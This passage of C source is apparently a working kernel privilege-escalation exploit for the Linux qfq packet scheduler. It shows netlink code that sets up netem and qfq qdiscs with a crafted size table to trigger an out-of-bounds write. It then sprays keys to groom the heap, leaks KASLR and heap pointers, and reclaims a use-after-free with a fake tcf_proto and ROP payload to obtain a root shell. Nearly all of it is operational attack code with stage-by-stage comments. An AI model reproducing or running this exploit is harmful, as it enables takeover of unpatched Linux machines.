  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  int err = netlink_errno(s, nlh);

  // This sometimes shows EBUSY, but it still works?
  // We just ignore the error, ...
  if (err != -EBUSY && err != 0) {
    E("failed to create tcfilter!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a netem qdisc with a large delay, used to slow down the enqueue / dequeue logic
// Create a netem qdisc (RTM_NEWQDISC) under `parent` with a ~5000 s delay
// and a queue limit of 1. The huge latency keeps the first packet parked in
// the enqueue/dequeue window; the limit of 1 makes every later packet —
// including the one that triggers the vulnerability — get dropped.
// Returns 0 on success, -1 on failure.
int create_netem_qdisc(int s, int ifindex, u32 parent, u32 handle) {
  struct nlmsghdr* nlh = calloc(2, 8192);
  // BUGFIX: calloc() was dereferenced without a NULL check.
  FAIL_IF(nlh == NULL);

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWQDISC;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = parent;
  // qdisc handles only use the major (upper 16) bits.
  data->tcm_handle = handle & 0xFFFF0000;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  do {
    attr->nla_type = TCA_KIND;
    attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("netem") + 1);

    char* attr_data = (char*)attr + NLA_HDRLEN;
    strcpy(attr_data, "netem");

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;

    attr->nla_type = TCA_OPTIONS;
    attr->nla_len = NLA_HDRLEN + sizeof(struct tc_netem_qopt);

    struct tc_netem_qopt* netem_qopt = (void*)attr + NLA_HDRLEN;
    netem_qopt->latency = 1000u * 1000 * 5000; // latency in us
    // this limit is important:
    // we want the first packet to be delayed indefinitely, but
    // the second packet, which triggers the vuln, to be dropped.
    netem_qopt->limit = 1;

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;
  } while (0);

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create netem qdisc!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a qfq qdisc, main qdisc of interest
// Create a qfq root qdisc (RTM_NEWQDISC), the main qdisc of interest.
// If `with_stab` is set, a TCA_STAB size table is attached that maps packet
// sizes to (table[in_size >> 9] << 7); entry 1 is chosen so a 512-byte
// packet is re-sized to LMAX, which is what triggers the vulnerability.
// NOTE(review): `parent` is accepted but tcm_parent is hard-wired to
// TC_H_ROOT — presumably intentional since callers only pass TC_H_ROOT.
// Returns 0 on success, -1 on failure.
int create_qfq_qisc(int s, int ifindex, u32 parent, u32 handle, int with_stab) {
  struct nlmsghdr* nlh = calloc(1, 4096);
  // BUGFIX: calloc() was dereferenced without a NULL check.
  FAIL_IF(nlh == NULL);

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWQDISC;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = TC_H_ROOT;
  data->tcm_handle = handle & 0xFFFF0000;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));

  do {
    attr->nla_type = TCA_KIND;
    attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("qfq") + 1);

    char* attr_data = (char*)attr + NLA_HDRLEN;
    strcpy(attr_data, "qfq");

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;

    if (with_stab) {
      // Prepare the sizetable. This sizetable is used to trigger
      // the vulnerability.
      // Essentially we setup a lookup table where the resulting
      // packet size equals to (table[in_size >> 9] << 7)
      // We choose those bitshifts to have some room for packet headers
      // that we do not have to care about.
      attr->nla_type = TCA_STAB;
      attr->nla_len = NLA_HDRLEN;

      struct nlattr* nested = (void*)attr + NLA_HDRLEN;
      nested->nla_type = TCA_STAB_BASE;
      nested->nla_len = NLA_HDRLEN + sizeof(struct tc_sizespec);
      attr->nla_len += nested->nla_len;

      struct tc_sizespec* sizespec = (void*)nested + NLA_HDRLEN;
      sizespec->cell_log = 9;
      sizespec->size_log = 7;
      sizespec->cell_align = 0;
      sizespec->overhead = 0;
      sizespec->linklayer = 0;
      sizespec->mpu = 0;
      sizespec->mtu = 0;
      sizespec->tsize = 2;

      nested = (void*)nested + nested->nla_len;
      nested->nla_type = TCA_STAB_DATA;
      nested->nla_len = NLA_HDRLEN + 2 * sizeof(u16);
      attr->nla_len += nested->nla_len;

      *((u16*)((void*)nested + NLA_HDRLEN) + 0) = 0;
      // This is the size that triggers the vulnerability
      *((u16*)((void*)nested + NLA_HDRLEN) + 1) = LMAX >> 7;

      nlh->nlmsg_len += attr->nla_len;
      attr = (void*)attr + attr->nla_len;
    }
  } while (0);

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create qfq qdisc!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Delete a class from a qdisc
// Delete class `handle` from the root qdisc of `ifindex` (RTM_DELTCLASS).
// Deleting the class created on top of our fake aggregate is what frees the
// aggregate and sets up the use-after-free.
// Returns 0 on success, -1 on failure.
int delete_class(int s, int ifindex, u32 handle) {
  L("deleting class %x", handle);

  struct nlmsghdr* nlh = calloc(1, 4096);
  // BUGFIX: calloc() was dereferenced without a NULL check.
  FAIL_IF(nlh == NULL);

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_DELTCLASS;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = TC_H_ROOT;
  data->tcm_handle = handle;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to delete class!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Add a helper class to a qdisc
// Add a qfq class `class_handle` with the given TCA_QFQ_LMAX to the root
// qdisc (RTM_NEWTCLASS). If `sub_qdisc_handle` is non-zero, a netem child
// qdisc is attached under the new class as well.
// Returns 0 on success, -1 on failure.
int create_helper_class(int s, int ifindex, u32 class_handle, u32 sub_qdisc_handle, u32 lmax) {
  struct nlmsghdr* nlh = calloc(1, 4096);
  // BUGFIX: calloc() was dereferenced without a NULL check.
  FAIL_IF(nlh == NULL);

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWTCLASS;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = TC_H_ROOT;
  data->tcm_handle = class_handle;


  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  struct nlattr* nested;

  do {
    // TCA_OPTIONS wrapping a single nested TCA_QFQ_LMAX (u32).
    attr->nla_type = TCA_OPTIONS;
    attr->nla_len = NLA_HDRLEN + NLA_HDRLEN + sizeof(u32);

    nested = (void*)attr + NLA_HDRLEN;
    nested->nla_type = TCA_QFQ_LMAX;
    nested->nla_len = NLA_HDRLEN + sizeof(u32);
    *(u32*)((void*)nested + NLA_HDRLEN) = lmax;

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;
  } while (0);

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create helper class!");
    free(nlh);
    return -1;
  }
  free(nlh);

  if (sub_qdisc_handle != 0) {
    return create_netem_qdisc(s, ifindex, class_handle, sub_qdisc_handle);
  }

  return 0;
}


// Worker to spray qdiscs and potentially trigger the vulnerability.
// Each worker will have its own network namespace and create qdiscs
// for the loopback device.
// We could create virtual devices, but here we are.
// Per-worker exploit driver, run in its own user+net namespace (CLONE_VM).
// `arg` points to the worker id `i`; the main process sequences the stages
// by storing that id into `wake` and waiting on parent_notify.
int bug_worker(void* arg) {
  int i = *(int*)arg;

  // Handles derived from the worker id: root qfq qdisc, the OOB class, the
  // helper class, and the class later created on the fake aggregate.
  const u32 handle = 0x10000000 | (i << 16);
  const u32 handle_oob = handle | (1 << 0);
  const u32 handle_help = handle | (1 << 1);
  const u32 handle_faked1 = handle | (1 << 2);

  const u32 sub_handle_help = 0x20010000;
  const u32 sub_handle_oob = 0x20020000;

  const int loindex = if_nametoindex("lo");

  int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  FAIL_IF(s < 0);

  struct sockaddr_nl addr = {0};
  addr.nl_family = AF_NETLINK;

  FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0);

  if (prepare_device(s, loindex) < 0) {
    return -1;
  }

  // Prepare qfq qdisc without anything else.
  // Eventually we will create everything of interest when we pull the trigger.
  // Until that this qdisc serves as some kind of "grooming" object
  // Note that this qdisc is created with a specifically chosen TCA_STAB
  // so that we can trigger the vulnerability.
  if (create_qfq_qisc(s, loindex, TC_H_ROOT, handle, 1) < 0) {
    return -1;
  }

  EVENT_SET(parent_notify);

  while (!done) {
    // Busy-wait (with sleep) until main selects this worker.
    while (wake != i) {
      sleep(1);
    }
    wake = 0;

    L("worker %d is entering stage 1: trigger vulnerability", i);

    L("trying to prepare helper class ..");
    // This is a real helper class: We use it to make the code below follow
    // certain paths in sch_qfq.c
    // We require the following:
    //  - qfq_sch->in_serv_agg != NULL
    //  - qfq_sch->in_serv_agg != OOB agg
    // We use a netem qdisc with a large delay to consistently hit the window
    // between qfq_enqueue -> qfq_dequeue where the in_serv_agg would be reset.
    if (create_helper_class(s, loindex, handle_help, sub_handle_help, 0x1000) != 0) {
      E("failed to create helper class :(");
      return -1;
    }

    L("trying to prepare oob class ..");
    // Class which will carry the aggregate with the OOB group
    // In order to hit the desired update code paths, this class needs
    // packets in its (sub)qdisc. Additionally we ideally want to drop the
    // packet that causes the OOB group to be created.
    // We use the same netem qdisc for this, additionally the netem qdisc will
    // have a limit of 1 dropping all packets after the first one.
    if (create_helper_class(s, loindex, handle_oob, sub_handle_oob, 0x2000) != 0) {
      E("failed to create oob class :(");
      return -1;
    }

    L("activating helper agg ..");
    u8 buf[1 << 9] = {0};

    // NOTE(review): this inner `addr` (sockaddr_in) intentionally shadows the
    // function-scope netlink `addr` above; the netlink socket is already
    // bound at this point.
    int sc, ss;
    struct sockaddr_in addr;
    u32 addr_len;

    ss = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(ss < 0);
    sc = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(sc < 0);

    addr.sin_family = AF_INET;
    addr.sin_port = 0;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    addr_len = sizeof(addr);

    FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0);
    FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0)

    // SO_PRIORITY selects which qfq class a packet is enqueued to.
    // set in_serv_agg = helper agg
    FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_help, sizeof(handle_help)) < 0);
    FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    // make (not-yet) oob class active
    FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_oob, sizeof(handle_oob)) < 0);
    FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    L("spraying some fake qfq_aggregate ..");
    prep_agg_payload(&agg.agg, 0x10000000000001, 0x1337);
    FAIL_IF(spray(SPRAY_128, ATTEMPT_SMALL_EVERY, &agg, sizeof(agg)) < 0);

    // trigger vulnerability
    // (512-byte packet: the TCA_STAB table rewrites its size to LMAX)
    // note that this packet will be dropped by the child (netem) qdisc
    FAIL_IF(sendto(sc, buf, 1 << 9, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    L("spraying some more fake qfq_aggregate ..");
    FAIL_IF(spray(SPRAY_128, ATTEMPT_SMALL_EVERY, &agg, sizeof(agg)) < 0);

    close(ss);
    close(sc);

    L("waking parent");
    EVENT_SET(parent_notify);

    while (wake != i) {
      sleep(1);
    }
    wake = 0;

    // At this stage the vulnerability should have flipped a bit of qfq_sch->nonfull_aggs
    // pointing to one of our fake aggregates sprayed above.
    // We will now try to create a class using this fake aggregate.
    // This will eventually allow us to reach a UaF scenario.
    L("worker %d is entering stage 2: smuggle a fake aggregate", i);

    L(" trying to create class using the fake aggregate ..");
    // lmax 0x1337 matches the fake aggregate sprayed in stage 1.
    if (create_helper_class(s, loindex, handle_faked1, 0, 0x1337) != 0) {
      return -1;
    }

    L("waking parent");
    EVENT_SET(parent_notify);

    while (wake != i) {
      sleep(1);
    }
    wake = 0;

    // Deleting the class drops the fake aggregate's (zero) class count and
    // frees it — the key spray object is now dangling.
    L("worker %d is entering stage 3: trigger UaF", i);
    if (delete_class(s, loindex, handle_faked1) != 0) {
      return -1;
    }

    L("waking parent");
    EVENT_SET(parent_notify);

    while (!done) {
      sleep(1);
    }
  }

  return 0;
}

// Final stage worker which will spray tcf_proto payloads and hopefully trigger
// the one which gives us a shell
// Final stage worker which will spray tcf_proto payloads and hopefully trigger
// the one which gives us a shell.
//
// Runs as a separate child (see main: creating a netns from the parent fails).
// Sequence:
//   1. attach a qfq qdisc to lo and spray rsvp tc filters so a tcf_proto
//      reclaims the freed fake qfq_aggregate (key id_agg),
//   2. read the key back to leak tcf_proto->ops (cls_rsvp_ops) and rebase
//      all precomputed offsets (FOR_ALL_OFFSETS — defined elsewhere),
//   3. replace the reclaimed objects with a fake tcf_proto + ROP payload and
//      trigger it via an RTM_GETTFILTER request, retrying each spray based on
//      the error-code side channel described below.
// Returns 0 on success, -1 on any failure.
int final_stage_worker(void* arg) {
  const int loindex = if_nametoindex("lo");
  const u32 handle = 0x30000000;
  int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  FAIL_IF(s < 0);

  {
    struct sockaddr_nl addr = {0};
    addr.nl_family = AF_NETLINK;
    FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0);
  }

  FAIL_IF(prepare_device(s, loindex) < 0);
  // We want any qdisc here to attach the filters to, just re-use some code
  FAIL_IF(create_qfq_qisc(s, loindex, TC_H_ROOT, handle, 0) < 0);

  EVENT_SET(parent_notify);

  sleep(1);
  EVENT_WAIT(final_worker_notify);

  // We freed the fake qfq_aggregate (for which we have a key handle id_agg)
  // Try to reclaim it using tcf_proto s
  // We use rsvp filters, see below.
  L("spraying tcf_proto ..");
  for (int i = 0; i < 80; i++) {
    FAIL_IF(create_tcfilter(s, loindex, handle, 0x1000 + i) != 0);
  }

  // So this is a bit sketchy. keyctl_read will not copy the buffer
  // if the size does not match. This will force us to copy a HUGE
  // amount of memory which hopefully does not fault :(
  // This actually is a problem on the mitigation instance (presumably because
  // of the CONFIG_SLAB_VIRTUAL). To circumvent this problem we choose
  // a filter which has a very "low" address for its classify operation
  // (tcf_proto->classify overlaps the length field of our key)
  // "rsvp_classify" is the lowest I could find
  FAIL_IF(read_key(id_agg, &agg, sizeof(agg)) < 0);

  leak_cls_rsvp_ops = (u64)agg.tp.ops;
  L("leaked kaslr pointer (cls_rsvp_ops): %p", (void*)leak_cls_rsvp_ops);

  // Sanity check: a kernel text/data pointer must be in the canonical
  // upper half of the address space.
  if ((leak_cls_rsvp_ops & 0xFFFF000000000000) != 0xFFFF000000000000) {
    E("leak looks incorrect :(");
    return -1;
  }

  // KASLR slide: difference between the compiled-in address and the leak.
  i64 diff = cls_rsvp_ops - leak_cls_rsvp_ops;
  L("diff: %lld", diff);

  #define __x(name) { name -= diff; L("corrected %s to %p", #name, (void*)name); }
  FOR_ALL_OFFSETS(__x);
  #undef __x

  prep_tcf_proto_payload(&agg);
  prep_final_large_payload(&large);

  // Keep only the 8192-byte key holding our prepared payload (id_large);
  // revoke everything else so the slots can be re-sprayed below.
  struct key saved[] = {
    {
      .id = id_large,
      .type = -1,
    }
  };
  FAIL_IF(spray_reset_except(saved, 1));

  int spray_small = 1;
  int spray_large = 1;
retry:
  if (spray_small) {
    struct key saved[] = {
      {
        .id = -1,
        .type = SPRAY_8192,
      }
    };

    // Free the tcf_proto and reclaim it with a fake one
    FAIL_IF(spray_reset_except(saved, 1));
    FAIL_IF(spray(SPRAY_128, 50, &agg, sizeof(agg)));
    spray_small = 0;

    sleep(1);
  }

  if (spray_large) {
    struct key saved[] = {
      {
        .id = -1,
        .type = SPRAY_128,
      }
    };
    // Free the 8192 large key object and reclaim it with a prepared ROP payload
    FAIL_IF(spray_reset_except(saved, 1));
    FAIL_IF(spray(SPRAY_8192, 2, &large, sizeof(large)));
    spray_large = 0;
  }

  // Final trigger ..
  {
    // Build an RTM_GETTFILTER request by hand: tcmsg + a TCA_KIND attribute
    // naming our fake "exploit" filter kind.
    struct nlmsghdr* nlh = calloc(1, 4096);
    FAIL_IF(nlh == NULL);
    struct tcmsg* data = NLMSG_DATA(nlh);
    nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
    nlh->nlmsg_type = RTM_GETTFILTER;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_seq = 0;
    nlh->nlmsg_pid = 0;

    data->tcm_family = PF_UNSPEC;
    data->tcm_ifindex = loindex;
    data->tcm_parent = handle;
    data->tcm_handle = 0;

    // tcm_info packs (priority << 16) | protocol; these must match the
    // values planted in the fake tcf_proto payload.
    u16 protocol = 0xdead;
    data->tcm_info = ((u32)0x2222 << 16) | (u32)protocol;

    struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
    do {
      attr->nla_type = TCA_KIND;
      attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("exploit") + 1);

      char* attr_data = (char*)attr + NLA_HDRLEN;
      strcpy(attr_data, "exploit");

      nlh->nlmsg_len += attr->nla_len;
      attr = (void*)attr + attr->nla_len;
    } while (0);

    int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
    if (recvlen < 0) {
      perror("recv()");
      free(nlh);
      return -1;
    }

    int err = netlink_errno(s, nlh);

    // This sometimes shows EBUSY, but it still works?
    // We just ignore the error, ...
    if (err != -EBUSY && err != 0) {
      E("failed to trigger payload ..");

      // We have a small side-channel leak here, which makes the last step
      // relatively stable:
      // If the spray of fake tcf_proto failed, we will not find a suitable
      // filter with the requested priority, thus kernel will return -ENOENT
      // If the spray of the large prepared stack failed, the name of kind
      // will be all zeros, thus not matching the requested "exploit" kind,
      // thus kernel will return -EINVAL

      if (err == -ENOENT) {
        L("retrying small spray ..");
        spray_small = 1;
        goto retry;
      }
      if (err == -EINVAL) {
        L("retrying large spray ..");
        spray_large = 1;
        goto retry;
      }
      E("failed :(");
      free(nlh);
      return -1;
    }

    free(nlh);
  }

  return 0;
}

int main() {
  // main orchestration routine.
  // mainly manages workers and occasionally collects leak information
  //
  // Stage 1: repeatedly spawn bug_worker children; every ATTEMPT_LARGE_EVERY
  //          iterations, bracket the worker with 8192-byte key sprays
  //          (DO_BEFORE before, 3 - DO_BEFORE after) and scan the sprayed
  //          keys for a leaked qfq_aggregate pointer.
  // Stage 2: wake the worker again and scan the 128-byte keys for a
  //          qfq_group pointer, from which the 8192 key-payload address
  //          is derived.
  // Stage 3: hand off to final_stage_worker for the UaF/ROP part.
  //
  // NOTE(review): `wake`, `parent_notify`, `spawn_worker`, `bug_worker`,
  // `large`, `agg` and the leak_* globals are defined elsewhere in the file.

  FAIL_IF(_pin_to_cpu(0) != 0);

  scratch_buf = calloc(16, 0x1000);
  FAIL_IF(scratch_buf == NULL);

  int worker_i = 1;
  int ki;
  const struct key* key;
  prep_stage1_large_payload(&large);
  for (worker_i = 1; worker_i <= ATTEMPT_LARGE_EVERY*3; worker_i++) {
    // Only every ATTEMPT_LARGE_EVERY-th worker gets the full large-spray
    // treatment; the others just churn the allocator.
    int do_the_thing = (worker_i % ATTEMPT_LARGE_EVERY == 0);

    if (do_the_thing && DO_BEFORE > 0) {
      FAIL_IF(spray(SPRAY_8192, DO_BEFORE, &large, sizeof(large)) != 0);
    }

    FAIL_IF(spawn_worker(&bug_worker, &worker_i) < 0);
    EVENT_WAIT(parent_notify);

    if (do_the_thing) {
      FAIL_IF(spray(SPRAY_8192, 3 - DO_BEFORE, &large, sizeof(large)) != 0);

      // Wake worker `worker_i` (it polls `wake` for its own index) and wait
      // for it to finish its next stage.
      wake = worker_i;
      EVENT_WAIT(parent_notify);

      // Scan all 8192-byte keys: the overflow should have written a
      // qfq_aggregate pointer into one of the sprayed group slot arrays.
      ki = 0;
      while ((key = get_key(ki++)) != NULL) {
        if (key->type != SPRAY_8192) {
          continue;
        }

        FAIL_IF(read_key(key->id, &large, sizeof(large)) < 0);
        for (int k = 0; k < ARRAY_LEN(large.group.slots); k++) {
          leak_agg_ptr = (u64)large.group.slots[k].first;
          if (leak_agg_ptr != 0) {
            if ((leak_agg_ptr & 0x80) != 0) {
              // This is the bit we flipped. If it was already set, try again.
              // At this point we should be relatively stable (TM)

              E("we succeeded, but the qfq_aggregate pointer had the wrong bit set: %p", (void*)leak_agg_ptr);
              break;
            }

            id_large = key->id;
            goto stage2;
          }
        }
      }

      E("attempt failed. trying again ..");
      prep_stage1_large_payload(&large);
      FAIL_IF(spray_reset());
    }
  }

  goto failed;

stage2:
  L("leaked struct qfq_aggregate heap pointer: %p", (void*)leak_agg_ptr);

  wake = worker_i;
  EVENT_WAIT(parent_notify);

  // Scan the 128-byte keys: the fake aggregate smuggled by the worker should
  // now carry a kernel qfq_group pointer written by the qdisc code.
  ki = 0;
  while ((key = get_key(ki++)) != NULL) {
    if (key->type != SPRAY_128) {
      continue;
    }

    FAIL_IF(read_key(key->id, &agg, sizeof(agg)) < 0);

    if (agg.agg.grp != NULL) {
      leak_grp_ptr = (u64)agg.agg.grp;
      id_agg = key->id;
      break;
    }
  }

  if (leak_grp_ptr == 0) {
    E("we failed to get the grp pointer?");
    goto failed;
  }

  // offsetof(Qdisc, group assigned to agg) + 8192 because the overflowed page is right behind the qdisc.
  leak_grp_ptr = (leak_grp_ptr - 5816) + 8192;
  L("leaked key payload 8192 pointer: %p", (void*)leak_grp_ptr);

  // stage 3

  // it seems we are not allowed to create a new netns here?
  // just move it to a new child ..
  FAIL_IF(spawn_worker(&final_stage_worker, NULL) < 0);
  EVENT_WAIT(parent_notify);

  wake = worker_i;

  EVENT_WAIT(parent_notify);
  EVENT_SET(final_worker_notify);

  // The final worker does the rest; park the parent forever.
  while (1) {
    sleep(100);
  }

failed:
  E("we failed .(");
  spray_exit();
  while (last_worker > 0) {
    kill_worker(last_worker - 1);
  }
  return 0;
}

/**
 * Key payload spraying helper routines.
 *
 * Spraying is a little complicated because of the quota restrictions on
 * sprayed keys and our multi-process architecture.
 *
 * We clone() a helper process (sharing our address space via CLONE_VM) which
 * allocates all the keys. That process owns all the keys, saving us the
 * trouble of dealing with key permissions. The cost is additional complexity
 * here: all the add_key/keyctl syscalls are essentially proxied through to
 * the helper process.
 */

// Thin wrapper for add_key(2); glibc exposes no stub for this syscall.
// Returns the new key's serial on success, -1 (with errno set) on failure.
inline static key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) {
  long id = syscall(__NR_add_key, type, description, payload, plen, ringid);
  return (key_serial_t)id;
}

// Direct keyctl(2) wrapper, used by the helper process itself (the public
// keyctl() below proxies through the helper instead).
// NOTE(review): identifiers starting with a double underscore are reserved
// for the implementation; kept as-is because callers use this name.
long __keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) {
  long rc = syscall(__NR_keyctl, option, arg2, arg3, arg4, arg5);
  return rc;
}

// Bookkeeping for all keys allocated by the helper process:
// a growable array of {type, id} records (filled by spray_buffers).
struct spray_info {
  int num_keys;      // number of valid entries in keys
  struct key* keys;  // heap array, grown with reallocarray
};

// Commands understood by the helper's spray_worker() loop (written to shm.target).
enum {
  CMD_spray_keys = 0,  // allocate n keys carrying a given payload
  CMD_reset_keys = 1,  // revoke all currently tracked keys
  CMD_keyctl = 2,      // proxy an arbitrary keyctl(2) call
  CMD_stop = 3,        // terminate the helper loop
};

// Command mailbox between the main process and the spray helper.
// Both run in the same address space (clone with CLONE_VM), so a plain
// global plus the event_begin/event_end handshake is enough.
struct shm {
  int target;  // one of the CMD_* values above
  union {
    // CMD_spray_keys arguments
    struct {
      int type;       // caller-chosen spray type tag (e.g. SPRAY_128)
      void* payload;  // key payload to copy into each key
      size_t plen;    // payload length
      int n;          // number of keys to allocate
    } add_args;
    // CMD_keyctl arguments
    struct {
      int option;
      unsigned long args[4];
    } keyctl_args;
    struct {
      const key_serial_t* except;
    } reset_except_args;
  } u;
  int err;  // result of the last command (helper-written)

  // Handshake flags: caller sets event_begin, helper sets event_end.
  int event_begin;
  int event_end;
};

// Handle for the cloned spray helper process.
struct helper {
  void* stack;  // 0x4000-byte mmap'd clone stack (cached across respawns)
  int pid;      // helper pid; <= 0 means "not running"
};

// Key bookkeeping; mutated by the helper process (same address space, CLONE_VM).
static struct spray_info info = {
  .num_keys = 0,
  .keys = NULL,
};

// The (lazily spawned) spray helper process, see ensure_helper().
static struct helper helper = {
  .stack = NULL,
  .pid = 0,
};

// Shared command mailbox; both handshake events start in the "unset" state.
static struct shm shm = {
  .target = 0,
  .err = 0,
  .event_begin = __EVENT_UNSET,
  .event_end = __EVENT_UNSET,
};

// Allocate `n` "user" keys carrying `payload` and record them in `info`.
// Runs inside the helper process, so the keys are owned (and quota-counted)
// there. Returns 0 on success, -1 on allocation or add_key failure (keys
// already added stay recorded so a later reset can revoke them).
static int spray_buffers(int type, void* payload, size_t plen, int n) {
  char desc[32] = {0};

  // Grow the bookkeeping array through a temporary: assigning the
  // reallocarray() result straight to info.keys would lose the old array on
  // failure while info.num_keys still counts its entries.
  struct key* grown = (struct key*)reallocarray(info.keys, n + info.num_keys, sizeof(struct key));
  if (grown == NULL) {
    return -1;
  }
  info.keys = grown;

  for (int i = 0; i < n; i++) {
    int j = info.num_keys;

    // Unique description per key; add_key() would update an existing key
    // with the same description instead of allocating a fresh one.
    snprintf(desc, sizeof(desc) - 1, "%d-%d", type, j);

    info.keys[j].type = type;
    info.keys[j].id = add_key("user", desc, payload, plen, KEY_SPEC_PROCESS_KEYRING);

    if (info.keys[j].id == -1) {
      return -1;
    }

    info.num_keys ++;
  }

  return 0;
}

// Helper process main loop: wait for a command in the shared `shm` mailbox,
// execute it, publish the result in shm.err and signal completion.
// All key syscalls happen in this process so it owns every sprayed key.
// (Removed an unused local `ret` from the original.)
static int spray_worker(void* unused) {
  while (1) {
    EVENT_WAIT(shm.event_begin);

    // Default to failure; each command overwrites this on success.
    shm.err = -1;
    switch (shm.target) {
    case CMD_spray_keys: {
      int type = shm.u.add_args.type;
      void* payload = shm.u.add_args.payload;
      size_t plen = shm.u.add_args.plen;
      int n = shm.u.add_args.n;

      shm.err = spray_buffers(type, payload, plen, n);
      break;
    }
    case CMD_reset_keys:
      // Revoke tracked keys newest-first; stop at the first failure.
      shm.err = 0;
      while (info.num_keys > 0) {
        int i = info.num_keys - 1;

        if (info.keys[i].id >= 0) {
          if (__keyctl(KEYCTL_REVOKE, info.keys[i].id, 0, 0, 0) < 0) {
            shm.err = -1;
            break;
          }
        }

        info.num_keys --;
      }
      break;
    case CMD_keyctl:
      // Proxied keyctl(2). NOTE(review): shm.err is an int, so a long
      // return value (e.g. a large read size) would be truncated.
      shm.err = __keyctl(shm.u.keyctl_args.option,
        shm.u.keyctl_args.args[0],
        shm.u.keyctl_args.args[1],
        shm.u.keyctl_args.args[2],
        shm.u.keyctl_args.args[3]);
      break;
    case CMD_stop:
      goto exit;
    default:
      break;
    }

    EVENT_SET(shm.event_end);
  }

exit:
  // Acknowledge CMD_stop so the caller's EVENT_WAIT completes.
  EVENT_SET(shm.event_end);
  return 0;
}

// Lazily spawn the key-spraying helper process.
// The helper shares our address space (CLONE_VM) and serves commands through
// the global `shm` mailbox by running spray_worker(). The 0x4000-byte mmap'd
// stack is cached in `helper.stack` and reused if the helper is respawned.
// Returns 0 on success, -1 on mmap/clone failure.
static int ensure_helper() {
  if (helper.pid <= 0) {
    if (helper.stack == NULL) {
